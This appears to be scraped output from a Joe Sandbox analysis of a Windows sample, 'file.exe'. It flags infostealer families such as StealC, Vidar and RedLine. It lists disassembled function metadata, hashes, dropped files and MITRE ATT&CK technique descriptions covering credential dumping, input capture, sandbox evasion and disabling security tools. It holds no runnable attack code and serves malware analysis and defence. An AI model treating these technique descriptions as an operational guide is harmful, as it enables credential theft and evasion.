Part of subcall function 004AE049: GetOEMCP.KERNEL32(00000000,004AE2BB,?,?,004A73DE,004A73DE,?), ref: 004AE074

_free.LIBCMT ref: 004AE318

Strings

@"M, xrefs: 004AE340

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: _free
String ID: @"M
API String ID: 269201875-537145311
Opcode ID: 7bb3aab487b61b1d239e76062d573da0d0e9d9fdfce8b37be92ffea9996c9962
Instruction ID: 18ae2582593ef71bb1f4fc45a6f2300bcca04dc0351993bbab4acfb652e5aea9
Opcode Fuzzy Hash: 7bb3aab487b61b1d239e76062d573da0d0e9d9fdfce8b37be92ffea9996c9962
Instruction Fuzzy Hash: F231EE71800209AFCF01DF5AC880ADB77B5AF62314F14006FF9209B2A1EB3ADD00CB64

Function 0048B436 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0048B4BE
RaiseException.KERNEL32(?,?,?,?), ref: 0048B4E3

Part of subcall function 004A3961: RaiseException.KERNEL32(E06D7363,00000001,00000003,004CE398,?,?,?,004CE398), ref: 004A39C1

Part of subcall function 004A89DF: IsProcessorFeaturePresent.KERNEL32(00000017,004AA51D,?,?,004A67AA,?,?,?,?,004A73DE,?), ref: 004A89FB

Strings

csm, xrefs: 0048B472

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: ea064e5b7a136638eb646b3b4cda2926af30600bb776d632553aad11c61fe9c3
Instruction ID: 9b18d9d7dfa3af137ca40477382588febc7ea8177f13d4615508b27f1a5bad9b
Opcode Fuzzy Hash: ea064e5b7a136638eb646b3b4cda2926af30600bb776d632553aad11c61fe9c3
Instruction Fuzzy Hash: 10218131D002189FCF25EF95D842AAFB7B9EF00B10F14081EE905AB252CB78AD45CBD5

Function 004A7244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?,?,?,00000000,00000000), ref: 004A72C4

Strings

nlJ, xrefs: 004A72E2
./\, xrefs: 004A725D

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: DriveType
String ID: ./\$nlJ
API String ID: 338552980-1001347824
Opcode ID: a58f347786e16a3075382967fdaebf3d56092cf4ba9caf36592da352d9e165f8
Instruction ID: 0f80518bb554b335b6f18b22f1527ca96283433e454ef80da2d92681e2d646be
Opcode Fuzzy Hash: a58f347786e16a3075382967fdaebf3d56092cf4ba9caf36592da352d9e165f8
Instruction Fuzzy Hash: 30119C365002085ACB346F68DC81BFF73ADEF67304F5400AFF50157282DAB85E82855C

Function 0049332C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0049335C

Strings

pScheduler, xrefs: 00493354
version, xrefs: 00493341

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: e1790ea90a777bb00beb18bcda206b6e91b29181cb2f11cb54323244cfba9c56
Instruction ID: 95a05ff1a23557b72a26766d406524f32d2e965f9800aea58bc143cc5cb0fae0
Opcode Fuzzy Hash: e1790ea90a777bb00beb18bcda206b6e91b29181cb2f11cb54323244cfba9c56
Instruction Fuzzy Hash: D0E02034584308B9CF10FE55C806FCD37189712309F10C03B7900200919BFC8788CEC9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Threatname: Amadey

Threatname: Cryptbot

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AKJDGIEH

C:\ProgramData\AKJEGCFB

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre